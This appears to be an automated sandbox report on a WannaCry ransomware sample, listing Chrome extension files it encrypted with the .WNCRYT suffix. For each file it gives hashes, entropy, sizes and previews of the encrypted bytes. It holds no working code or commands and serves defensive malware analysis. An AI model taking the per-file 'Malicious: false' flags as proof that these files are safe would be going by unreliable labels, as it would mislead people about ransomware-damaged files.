SHA1:	E709B46292CED7436AFE212C8236875154AB0F1E
SHA-256:	B308B125A4C5E7570E53BD44C201765D31C09BCAB20332EEA92A58558C80D9AC
SHA-512:	0C43152AD933F7795544CF84A2404B9D7E6077DB7944BACA9F0E615696A36A2AAEB6874C253C4EECC6ED7F4D1698E982AE93528A60794E1D510C3F19D2473614
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.....W...x....x8w."...-W:.2h.yY./}..V..P$$.e.<xs._..h+..x_.G.....$n..;.o...d2..6.hY...Gv4X {{.w.$...#.Y..J..<.N.W..U`4+q%...P.f&H..Y.b\|.....4p..........8.!.U..Qp....#..`..9(f6...f..;..U..A..).1. .\:..3..~u.........-.-.....N..j.y5...k.UP.n...H..%MQ....[........1D^8....3.q.>.3uJH.F.M.8IX2........fy.7......R...X.'.Sh..6.}........H5..'0..'..p'-..3..;..*.u

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\128.png.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	4200
Entropy (8bit):	7.946292875567455
Encrypted:	false
SSDEEP:	96:oujVfB5sVj/KBbWvy8ob8fPQsDg+HD1gm1qI1wioVGkk+7VRSTgNgSZkxQ:tNHsVWKfosDVDCCqI1w1VGkk2VR+gNgc
MD5:	E7764027F01C80CC2EDA05D977D1B0CE
SHA1:	62E146FD5079AEC742F1EA49C1816509A5EDC300
SHA-256:	169166F171027B8C29E21622B235FBC3F84D14A8902D3B74C0A9F5434EDE60B5
SHA-512:	95582BA285FD69F9048E4A522AEF28E056EC270B27C36167E7661DB8D70294A9A30050BB1D3545C262FFAACF273762B25C2A3E938A3255A36B8EF712A7359F01
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....N...&.t...{.%..S#...aB..<.`...<...>.....a.B...#}.......[.....7?z....8.@.).b..{@.V..;.Il..cZ..}...U....u.?i.l....;......}..Y..2.n./.F..d.]D...0I.."2.IV.=...!. ET.=?..X.P ...B..r..I..F(Z...9.'.#....[.x.<X......{..$E.%Ga.f.4..w.8.R.../... ....D........@kd.H0..=.'...............C....NgF.w...bB..?....Q.Pz.{......U.=.Afg.......{..g6Z..../S..T[.........N...U..7.K@......v.TN9.p .].b...N[..\|.IS..'gw.....r ..~..}.9....;`NF.0E`.c..a.......^.,q.....H......B.P.d.q.}"......S;.....4... .EK.....w.s.....^..m.yS..............\Jf.Vd.a....P............`?.,`4...,...N......2..]!...l.?.?[&..s..s..T...n..Wl..L.#...!...J...i..<M:r:..I.....M.)..Jz..(...w..:...=..iN..q.?S....z....9jTHP]7C..a.W..A.u@..`8.;..Q..X.#c%.^......Fu...?.3...P~.HQ......\.,~[.....=..X.<.4..k.<....O....w.e"..(K.]...{5)..7?^q..6.......V....iU..d...C.VND..!.Myy...!.3;.n.UNJ...B/~....na..\|.....'..E.?....}..6^....%.x...m\...D.uT.KG.@..!..$Wp..d...Y]...z.......[....!H!$.;.

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\128.png.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	3688
Entropy (8bit):	7.939409933858059
Encrypted:	false
SSDEEP:	96:ot/kevO7ermwOfgiIdLFxNBt1OylzMP13Tou2n/t5tAG+9apblys:gkeueSwOoR9nlzqh2JAG+9qbMs
MD5:	A48D5FFDDFD1E4A088EA37A206B76D3A
SHA1:	D428AD4E5402DA766CA45AC07D2004D0AA36B0B9
SHA-256:	DD71E604E3D8DE5C215B8B5730B1BFBA8C9DEF565237AA53B5965281E8B975AE
SHA-512:	9DC564E2819319F21477490A5CF69BAAF8F719E633DECF0FFE84467B08EE972FBAC5E20ADFE57B80FE210B55C8B4D2182D99583E992D6DEF414F0B9322FA48B2
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.......-....^.J.b...D7m.....?....VG..9\|.m.q.S.26..6 Z..=.^........E\.....^.....5........#.9.#%.s..>...x...X....t.)j...O.."GuU.eJ..k.b...QD.L..P..9....Q...G...s..^,...\|F.Xn..H~..C...\|....'.5...$.);.....A..5.U.8(.fGo9N!.E...Y..Lq.9S.fqw..f.r.M9D.....M...........=V4.V.4...x........b$.@(h.L..4..~...D..........75WBq...)LK.........`.....\|.r."....$.....r0...i....W..W..8....;L...P...c...#N'a}.q.Q.o.k$........x\|...y.'..n)..\Ya\|^.h...;...'f.j..0\....7t.v....28...\|..V.....#a.x(N.......O..b.j.....!..ZI.c.?t.\.Q....ZxPb.?....?it.L.n...@y....5.;vg^.:....6..v7H..)^#.B.$./U5.9......R/K. `B8T.XP....k.....1....-......7..j....E.[...9.b5...#.Z.3. .....M...lE.`.....oyi\^.`...^.).P...1=EQ$].{0....0+.F.. .%B.l......."G..`C..RM6r.F\.H....!}U.f.#...<.?..-\|.>...jp.#.5xm.+..(...w?.(.....@.....CWB...&7.l\v.....*.............(.s.'a4<....6[....L....\|..T0.s~~=2..;..I......Y...\|N.t......P...muor...7..2.&z.^..9.i...6.w.q..\|hJ..S.c.H....7.{:.i..O...6 .....

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\icon_128.png.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	3688
Entropy (8bit):	7.946888013050295
Encrypted:	false
SSDEEP:	96:oaWTipjRnvXRFqlhJkgTxeKG/kBeLjBdxn7zShrn3vOBzJ:tIiNRPkbkYehn7zSp3mhJ
MD5:	4ED80B14175014CF0C9A3E4655775916
SHA1:	073F42590B33FD32A23E6D7F11AD38EB29B95F1D
SHA-256:	D638196DFED719159BCF7DD37E5B2FE8A3B5A1A75FECC901B126528C3FDB3DAC
SHA-512:	CB2661EAAC6AB12ABD85F37C0735E065BC91704B15610D84058ACA4F954F61E1FCC5DE280D515E6622C5DE987E2EF0AE5489A2A6126113903277168D12F0396A
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....({]JD.2...;..HZ..o.-~...(....$.v.4.M..M.......:..n.`,. .}......\......%..a0.X.i..!../7...&.....z..x.c..... .^{...3%...f.ql.. .....w....../.f0l..%.W...To......j..J..p....k)....s\|~.Pkr.9.c.M\.7.....hdG.......s0.(..]....\|.....T..$.VfP.d/....1;:@z`....H.......V..$...@..8>......w.n..V.8...."..y.5..HF.;....#[...$>n?_..u....fO....G.....5....-\....Ce.H..%..2.9.>.#.X):..[_.a.,...Oq.."N..h.Y.R.9..nq.@..t.A.ME.6..N..........x.M.IoUFXz....dR..>....>:...\|..PT.../...`.._....H(.]Q..(U..b......`p.yb....b.....L....%. ....sh..Y.K}.=......t+....-EG.@..N1..uT........n...}fu...i...=%-.U...!.".....G6&.").x~a.G..i&........G>.5.G..)L5..K....H...-...7...?qF. ]....W......o.S.r....s....?T....>%.i.O.-......v@..i..6./...P.$.....x"..\|#G.~F......<B.E..GL.Z....4..W..1.........>z..uW..o......\...'..<.Xy...fn..9Vl...=_@..:...&Z..... p...:.........S.H!2TZ0<.O)\_M._...k.nx.r..S.l\|.0....)...H.y0...\iSb....r.....U..}OS...(..Vz....%..j(.cK8can.....}Y..^.

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\icon_16.png.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	440
Entropy (8bit):	7.46527227091613
Encrypted:	false
SSDEEP:	12:bkEgWdwUmTKbLjLJh9hFPub0Wgjg+SgMOcCCCu1:bkN6gE9hfdu9gU9gMOcx
MD5:	51A575B4836ED466370EFC9AF230CB3F
SHA1:	25D6D193170F501988B4FD183A1269AC9718699A
SHA-256:	F72B96F2C8009C2812C96F657E3A8C49ADB1D9FDEA8F81CD576D0807FB89B8B5
SHA-512:	A03B0B3287DEDACB4EDA07E744B4B6074D0ADFDE2A573299125C7B50B1C19CDC63A89888982092275DC3A4404C237D56E4191B98AD682C782C5E4F15A791C407
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!......z,.5...Qvs._...,.K`....JNc(..~...2y>)....R7b....=............T......1..#.S.S........w..'..2..c@.....N......a...b.2..5.E.F.../3O.b...d,.a..v......V6.R....X..YH.....^m..Wo.(".X....cMjv.PM.@.S.[..G..`.41.e........Xin.Rk._&.r.({....8.=.o..l.6..................:Z:.+.jE.v$......13k..R{Nr.YW..ehL......`..c../.../..9..{b.Qc,Z...$.pBL<.v...D.+.;x.u..K..$....X.n..Z.k.dp..-.....,z..x.<m../.'..........C..7......R...Yz

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\main.js.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	376
Entropy (8bit):	7.335274517122826
Encrypted:	false
SSDEEP:	6:bkE7FZ3jJrmWgS8sq6xZuhi3N1EIKMusdGdiiGXTxMXytp8dKVXqXQzjP:bkE7/jJC/+qXhi3N5MiPftSdKVXqAHP
MD5:	9393C9661FFE52338B16DBDEA7788903
SHA1:	BF58CDDA498B9A1C58C1F627B31240ABAEABA2D2
SHA-256:	8FC8F561FF511A06DD3AED32BEE9D509CA2E22D3AEFC2DCD6A345AF3A453296E
SHA-512:	E5848213E78EDBB0E7A3112EE0FDA25020408DCD55764DCC04A0C0D10D3F23F5590A9FDC7DFC430F577DBEF2EAEE78C45F2761F1C84245E03A04ACC2B21E77E4
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.....p!I....l..h..wn..7Sd.O........W..Cb.>.C.........C.Z..... ....)i..b.~a..c.-.^;...7A.p...p.\|r."..Q.gxY4..t...R..../wB(.......l.._...U....?.MWcY\...N..3....4<...8.@.eA&.....A_.h...>.SXg...>....R.6[../T....S.L!mk@...G.,.....]...%...o..o..lp{9.\|...._.........GT(.....6+$I.2./F..G..[..9.a!jG.=N.8#r.F...o.27>.&.(G:L..z..p1<..q>R...O.I..C.{z.l?.X.hW

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\128.png.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	5272
Entropy (8bit):	7.964105296553364
Encrypted:	false
SSDEEP:	96:otj0HDFEC+pBmUK5pikinqq7p3k/7p9JagzwO/u/EYE0vcZ7gVG5TDRNKyi0h:E0H7+pGYk0qYkTp9JRz5m/5cZUE5TNN1
MD5:	ABDF019FAECF8584418B8A08ECC1034E
SHA1:	5070079797A6A8BA7F1FDC9232268D0581A032E1
SHA-256:	E7AB742CF8092D62F38CC51A9DC039AA7A3471E7FB582D364AC7E95D75D61FD6
SHA-512:	AB484FFAFDE4A3B52BA221D2B7B4ED4D61437D2037219F083CE091D0038B49B73B46DE018C61E500A98940B8F659D236CCA205225EAA6234C734B88EA86F15C6
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....u.M\.....{A...$RX..P.w\...m.1.=w... ..\|.3m5.qy.../.JI...r....I..p.'.j.].../.FWyM...2^..v<..].!5...T....nw1. ....<k.f:..w..T..)`..4.Z.:..k.v...........$.u-`..!..cIi..kD..L(.~W._.../....#.q.mB..\d.\|...Pp..C.xn.H.=P.I.%p....3..dc...CI..b.z>....`.....v.......H.vW..-.v.k_...C........v....p..n2..2....T+..:..Q.?z..d!.q,>.++....x&.K.'.!..!.v.`?......0.......o2...K..P_..m............xS..Q.f.k.(g.zB..Y.>.w..o.\|......4.H.><(uz9...?\|.....$C.,.;.Ux.9...Z.-.Q.f.........s......k...."....\|.?...K._.?$9 \..X.d'h.......EO...D.R.V...l..$k.<..2l........x..$RA..`..s.T8.4..y.,......M......W.`fy..Z.....B.....YA.^b$.;.R./g.(-4.^T.......".7..h..S._....Mx64..a...J{..VH2...... ..B.K..[.^..r_&..p.....`@M...u.../XF^.7um...F&=R.........b1.Tu.%s.....#)..k..b..c..E...U+.;..'......Y....E~.....h.I.EN.^..q'~.{#..=.R.n..Uz.m!.b.!H....0.E.-..........6Zq.......oC..;.......Hj..H.......;..:\7.$...Svf..]d.........U*.4X...s.."m......`n{\...P..<+...g0U....

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\eventpage_bin_prod.js.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	78504
Entropy (8bit):	7.9976288515150795
Encrypted:	true
SSDEEP:	1536:TD81/xKawE2W7g+u7A0XYPRLJqC2RKlmWRZqULD/5JjUa:T41Zbt2W7fvPkRKYWFLtpUa
MD5:	BFCBC52DFF5E2C3C972D4BCC4671A061
SHA1:	CB4EE5A797774F17C7F91AEC1D08CED4774E90D5
SHA-256:	65C7D2FBC15D1610ED331EF7A79D851BE5EFDDB6B47BF6981FD7EC2A47DA7611
SHA-512:	4B71857789C607D7B953F1B7C362562A1EADF08F30B5942ED9C377F929A82B5A13CDF26175512097722EC2247F4A59071EF1C025173D67B24E6D5E871E9E4B4C
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!.....:zt}p..-...M'D..p.....!..Yf.....W.v..jv...cPv..s....\....6q.h...4....f....!z..=...v8.G...h...Q...u...".."Uf.VF..o.....(n.O.N..[..'....'d2....&j........6k...p_u.w...7.....p.....L.p......B)q...@..fiQA.1.'.N.vh.....2.p!r.a+..lE....0...n..M.a......1.......3B7........E.#.`5.&Y.%3.....K....3._J..P7.h..P.:,....7. ,.D.....Um%.8.?Q.......... S.HM8.Fp..W.......RT..=d.L..._..P..PB.......R...:.g....'....:.}6.........~J..$...05.......9..kY.?=Z.>..1..m..Ul3`...#..#.\|.7..(....W.t..t7.....<E...L....I/..w0..L......r.t,.j5...{.(k<.A...Af..T..Z..D..../&...l:\|......u4.O.....K6.q.4...]\u....Og.[...^xn.Th.WE...A..m..$<\|.."..qLb........H...L.v.X.\|.u....&.=2..{J...;.....V..t......N.Z../.7.SY.ygzO.%.'....sB.J..N.}PIw... ...Z.%.No.^..:..EG.@G...).ti.....5]..2....W....L.1..;[.u...b..L..f.V.O.Q.......:.I".).....1. X.-1..\...<T.,.......!.Y\|A_....s....~`.*P}L..^.............x...8.../h.N3.G.x.V/...._BT..../.........+.$\@..#wZ..#U..C....J..C`.k.j.3#

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\page_embed_script.js.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	584
Entropy (8bit):	7.600835241854629
Encrypted:	false
SSDEEP:	12:bkEHjvT/HIJa6MBM9Xps7mhPqSIfRMwd5OXYI+MoyGTgm3xng/7oEd0:bk27+a6MBM9XmmhSSIfRMwyoPM8TYu
MD5:	9FA93D0D98B5ABAAF922EBC37446C492
SHA1:	D290BD725F9753018A7AB8C0DC11F4DB28F1C14C
SHA-256:	F6C5C00314738EFBAB8B0FFDD7C03E44E762B9B0498C5592C0CB2B9BB2514123
SHA-512:	9F5BCF6403A67A1FB9D85B47BC41EB4931E00B7596980E95FD7EFBF1C6269597B0523500FDE7C03A5AA1BE9EBE35D73891ACA8E973A758BD8714AA6DFBCE99C3
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....A...:q...>4..X:....._..U.<.%.Z% ...x.O.d. ..r.7?.L.@6.?..n5..d,.B.Y[..j....<....H.2wqY.....w.I..'...E0.....>..@."3=......\........L.A..A....t!.T..e'.A....]....FV?.........../`.#O.Q......~M....@.H\|...W....\..&...!s.d.w].D...-.s.\|..V...x.0.....>.......#........imb..x..E.o\|.!.X......dS.Q5..':4^6o<..yi.J....$.]..d.... ..1..78m.....hFM..>v$.MCT..<W=.....$...J})........sb1...........va....3...k......B.[..r...f.5..L=.T.....P\...vLY...K%e.H.xZT....I.].-F.B.L;x....G.$Qo.L.....s.Z......V..N..._....9.!.....+,..&.+t..(.kCu....R..{/.m6.g.X.....

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\craw_background.js.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	544936
Entropy (8bit):	7.999640577501477
Encrypted:	true
SSDEEP:	12288:zgg7cWrBpBtb4Rl5+EKkNx/9sS7XE3+DPJ19nvwrt1oS4PCM:zge1+l1KkdXTDPJ1Bvwrfo7CM
MD5:	D9AD3576C43C10380C80041780609FF3
SHA1:	029D759D2FABB643A1A2FCDB3FDF0B55D864DB91
SHA-256:	71B52ADA6CAD547A5A622D4C8812B4CA9583EE8C3CE20D6BFCC5FF5B3B20873D
SHA-512:	DBF5AF76E1D1546737D178B0E6BC487E46427AB346F293B1BB69E5CD3ACF16DC9765F380FB917E4AF694AD49C1A1951371BEC8EA322D00A1941B17BA6CE20FE0
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!.......\|...-GG.K..pDT:g9.q.>0..zj.,i.K..S}....o.#y03.~E..L...a..b.C...$...w........\.Ag@6..0..G.].c0>.[S..O....l...`r.14.RP..%.HP..._.<z.9e.....'.......W(.p......`.`60A...k.r.DX...../..0.)\|.B.....Z....~.}F.....#..vD...[....V.x.'.ba..c@GP.5I%(.l.......O.........l.......2.gI..H..EW2.!K....x.#.>v.....m.i.4....am.}+.G.. ..y.l.M......F.A.....J..%.....=dj......R:b#........~...I.....O...t....;.(.7-b.[...~.HA.U..s.*.5k-......;.#H...0.....1Q.5.y.M.=..j........y...E.[.....b.....7.64...h.p.U.C 1..s.....B.\|.........'.Q....R.~..,hZKA..V......2..)..P...Gn-....H.a+Q..H....U..g....n.Y....8.e.Z..2......Oh\[.^.`......A.DysWy./..@..\|!.\|.l.s....h}V..<..~.O6j^...8.......7>t9..^B,."..g}R.!lm..G...j../.....=qn.=.}7..Lg....f.{x.......l\|eT3......N...$..Q.94...5.....(..f.R.....cm..}nv1b.b...bw....4..W..0..DW..7.#3.I..{,....Cb...^sY.R..........E.)8.O.h.......w)..+_s.F....:UQ.....U.M..H..W~......IJF.J..E..a.UX.. ......u,K..y...!X....?t.Y...{\X....'..4L+..

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\craw_window.js.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	261608
Entropy (8bit):	7.999431902619146
Encrypted:	true
SSDEEP:	6144:SMHQ1q0CqYwjfthRanMY+iphacGBbKDygboKEh3F:SMHoR574kChrGdKDygUV
MD5:	01C1F5BD621C5A0055556685705A37AC
SHA1:	E8FD3BE7D665B8668CA09388871D089E5C72C217
SHA-256:	E8CF2FDBB1DF57EC7A986CE8025A16884741DA9F7540BE4413E59160431FCF4B
SHA-512:	CBF4D1CA27559548E8D29CC09380C738F00FA6FE2BBB078D9261FB525205B41F60BFB629B0164CD0C5A09E1CB096F0FDE21AC05EC22B218F1858896ECB9E1FA7
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!.....b._...;<..&I.......r...o.......x..)..JIXJ.7 ..U...d?.w..a9Z....\|H..W\|U.V...?^nY..........h.O;.%......<.x...=.ShA3......>X.S.....Qg.k.....[`z...&.h.c`...lK.>.g...F.>H..Rd....48..7+.2.5$.........M.......d.......V...1.\..v~.Dm.t.]..................+..L.....Y+...g....2.G....gM./.$.[i...,.Y...6...U..h2...%.Ff.....M.9.....>..rF... )....7......L.%..M.....2...2..G....^...j....-...&.K.......o1.T..'.jw....wOn.<!._].......?/.?..%W.(.1.@P..x..T^!....e.J....D!`......T.......~P.......w.D%......8<..f....V..X.1..E...X....Q...(-...........2?!.......7t.1...79.#}............&..r....D....(W...'..M....(n(.....J....g..G..j..)m...}...c.1.T.}.%....'....O)....d...../....'.1..,..-...-\u~..eE>rj M...up...Z.jQR.^....f....:.....4.......Y...T....l .iX$..9.g*`..(.ha.7....r0+..y.N.}..f,...W....F>.uL..0R..A...\.e..7.G.9#.........uW ..4..~.$..-.i.....r..?q.CO....,.m.X...?..>.....^Js..5z...n#........M..y.U.B.I...g.\|..9mM....M...{`K.......dQ..

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\flapper.gif.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	70648
Entropy (8bit):	7.997121625382412
Encrypted:	true
SSDEEP:	1536:NVgEPvZkRNyGCiKP+ACD+SoeVQf1ethfS9Ox9jkw3L:NDvZSyLr+ACtoeVa1qS9OHk2L
MD5:	287C72C8A09F0594F1A54563D46F7C7E
SHA1:	6E6C82D0595B9CFCDB3DA53ECAEE759FB251355F
SHA-256:	8B53722EF3760CC5FFA4BAA9548E87E9631B7101B1C790655245F098FC3055C4
SHA-512:	9DD65724BAB4022920D095F9993FFEBE68F62FFB3C6E2FF7CE5B317303AC17E1EEFE5C9A9F5DDDBA3B356BBFED054002CEE458370E12196857B6C054D7E619F5
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!......[3Kn.H...{..>.H,...h.....{=....U.......og.j.&.E.CU.....[.>.......\|b.x.^c.w2.%#..I.w.0.b.......5...].S...x{TR..Q.%.E.-..q.\6k.k../..W./Ri.&..........Y..!l.Q...f...\|..h..d].Li.t.:5.6_...so m... .I..:u.......G..}b.G1."G..9J...=...@.2.........J............../.....lW([8PKQ..z....i..K..Xt.L.,.q7`..]R-...a$.P/.".3....B...........h....E.. J^.B......@Ql!<.i.sW/....d......Y7..N.Wge..t..K.m.8..Z..E.... P..\.7.Y].;...T.Z.a.1Os.A<i.T3....S^.&...5..Q.Rw.,.rt.0\A.H....6.f..:.....p9.B..fk.NE..;..B..._%.y.0._.q2..w...-):..]4.}Q..D....t..-D.K...../0V.,T.......L..5l....DTNRbP....D.=D.v"..\|F".v.1......;9.W>...x...0.s../../.fY....GG.W7.F^...TH.i.1'^.i...B.<%..Z.....{..3ACu..Jx].iO..do.....%..N..;G.UO#.S.oR...s..c.../6..S...g.x...6].2.g7.i(..{ o(....h..G.7.H...N..D......z.k.ps....HsB.[w.W.'O.....w;t..r(.)...K.....4,hj..v3..........J.5.....O..hG.@.......^..}y.K..n..^./..r.k#b...g....4.@.GX..rR...rEK8....}...A:..1..B-....M.zF%m..5......5.....

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\icon_128.png.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	4648
Entropy (8bit):	7.959921900268131
Encrypted:	false
SSDEEP:	96:oAgNxQmVwytrJLvfvpVkq7HkNlLFsXRbZIKYRS5tE40QbALu/ZVap5D:iNGmVwYxfvQqrkNlJIRbZIen0Qb3/7af
MD5:	81545C1A0732B9010342874713014C1E
SHA1:	AD8BCE5EC1651DCC61594183D9AF5DEE9E8273D7
SHA-256:	932981133E7B4090C43189B247CF4E041165268465688366E0B8E59B9B2F048E
SHA-512:	F207572BDF631FEB163911D76BCBAFCB2DCAE0E062DA6A3EDF0CA91A81807CD30514B10ACD9561507071EAB33C3A8DDF8B7AD4077A1FD92AE4F3F9D80992A33E
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....2+J..^.....j...........)/\|..3.I.0....e..Ud.....[M`..;h\........<0@L/.A....zG.t....,H......n9..n.y.....L.L..1f.............:......T.k{0~...<.o...i.b:.r..4.. C.2rp.g. ....+..;..y......U..$z<.g,...._...Bz......q..:..h.y.7..Q..../.^.[.../....P.............N.L1U..f...tb..h....W.....,.d5.d.G.vz..\..x....I...;.c.1u_`a...8...]-.!B#...5.T..o.-}]...l.Q.8W].e...p..q...s......P...66...{..sI..j..Y..W.s]...{.FYm.{...."W....j..y........\|..E0.....n..JX }f.f.)...1.hA.._....B.I.=-..a~Ar.X....J....QA......`.:....u.$-J.i..R..5-.m.AN.Z..<.6}.r.._.6.~.C..1...\|.....TyK..u.!.II..u........}-..Q$........N!.Z.,xl.......a.w.....2....uA.y......O..r.....s9V...@.......'^.up2z......q.q..o....3..1F.D..?.....K.,S..D..~i.U..=..7.d.:..tN.:..q..u. .o.9....-O...'.y........Y..74}..h.<U...r..&.Y...f.S6...&..........\.._'7hbkG.^.v....K...p....a..Y.!..7...6B......O.X.lTb.Hj.........(.p=...c...[...$t.&v..o.k.........aA7}K."........T...y..z...I....qp2..[rk../....

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\icon_16.png.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	840
Entropy (8bit):	7.713633564939909
Encrypted:	false
SSDEEP:	24:bkLfpdm92iqMhqntu41c+dhFL4W2XnFkiXS:bkjpviqyqntm6FLWXzS
MD5:	EE2F80C76ABAEC226764B56F578A2CBC
SHA1:	4C2F0107EAF91A65386BC2C3643D75CDFC1CFC11
SHA-256:	4CEA6D01B514DD728DB381CEF59843DC1C3BF72831DD49BD9805F21553A9CCD1
SHA-512:	F2FBF62DE10F9E0437E6A57B468BEA1414AD1357E08A269E9221BB2DCC069C4EE2BA751B2BBF23D864660A75CED64778CB24A2CCA57CF1E06E5C31AB384F8536
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.....:.....!...O5..teAX......j......[...u.%...hp.?m.X.p.+X....F....^?..v ...H....g.r.?R\|N....o.46../pS.}.."\|.o./..8....Q[.Jc.C.k.4?..`6. 2...,+....!q..x.T...4........]}t..,Q9...T.TC.!t..../..^.:i..z...."..#...$.4.v...%/....../@.6..X{....;....G..............._hJ......q..8j!{.9..7._.\|#.V.vND=.k2q.7..D..;:..zw\.z....C.(.~&.......cNY........E./..).Az........c...}.wI?......j.t0.A9.]V.0I..>..E..7....z.F.....;sS.....[\|3.....f.uw..oR.'.`......b\J%.n....i.ot-..Y.._D..h#..j.t.P..&#_.i%.......cf....U...$...v,W.....7.4../QR.....C..q..A...C.:.......T._.K...z.....F...B9.t.>Ui......v.4....._k.e..N.).om...B..a..{..`.._.........P.........UIwl%..yFX)...!.Y..vO...b.o.i......b..G....d..\|N.g.."..{..!....<...!Nv'C.\|{..Z..'5ok..y.f.......h..s.jk$.X.F.E..9.v*'a.t'..X.Y..U.-Oi.....J.,.B.....R.w.....I.....<

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\topbar_floating_button.png.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	440
Entropy (8bit):	7.420998017568119
Encrypted:	false
SSDEEP:	6:bkExqQXwp8zTdwfhkabEgp1Fn5sWTrG+GOMddxdzylAHUWtgMnG886JO4tk:bkEcB8+yabVvNOWTr23dzT0WCD64J
MD5:	F08B8A9C6773DD9FD469E718EBCE7777
SHA1:	FA0BDAB5112DE4ED612B5F68F4ADFDD1B55AFD52
SHA-256:	526C7BF5C98FF693F0D458B202070602D454222F24B2420EB40FAA2A9BC2FE63
SHA-512:	FF4AF563B1B31CEF22BBC8B415BCE9A6EC4FF1B9C0B305170F31144398E4A05E20E1BC5B4ACDEE44EE641DB231B053809904AF5B642C3CFC9274A72D71F9B370
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.......JM<.,J.K4.mm.....\.<.t8.t.....?.....t.;.,.^.CY....SX..^=...p...TP:O...1.c<.t..AO..X.i..t5...(..p..{o..e.Y.Jj.Ep.m..Z.....;..."f.......MiQI.Y#=..,e..y+..8.i.....I.\H...l....%..D3M.ip%Y}.5L...p^....1..pS.>r...........l.......;....3...#i..:.\C.R..............J4.......i+.K..`p8...+.M..,.R...i;.7.mCzH.6Y...0=!q..$...e...P.....<...d..~9..y..l........`.nS....,T..'.lcY>.p....,...K.zw.u]......@...G?....H-.6.&

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\topbar_floating_button_close.png.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	536
Entropy (8bit):	7.595738404557546
Encrypted:	false
SSDEEP:	12:bkErueU65JjZ0P8uoYZQFmZGgihfHXA8+Toqzmcgdi81ntk+U87T:bk0ua5JjZ9uFeFmZ6h/Q8+TDAw85tkQ3
MD5:	EFF7A880DA55221FC18960CAB7B54B7A
SHA1:	946EBDD842BCCB62EFF78BCC685632BE3C4447FD
SHA-256:	78EE4753C8AB703051BA7C3456CC1D9B7FC1377CC682A6D843E3EC08930D1DA0
SHA-512:	1C7344C1ED79E9335C8B992565BAD3513D7B64293FB07F799054A16BAA57E57D3A4398EBA48ABC14F8C4AB24DDBDCE57847A3B687C5F435EFC5B0CF72F479087
Malicious:	false
Reputation:	unknown
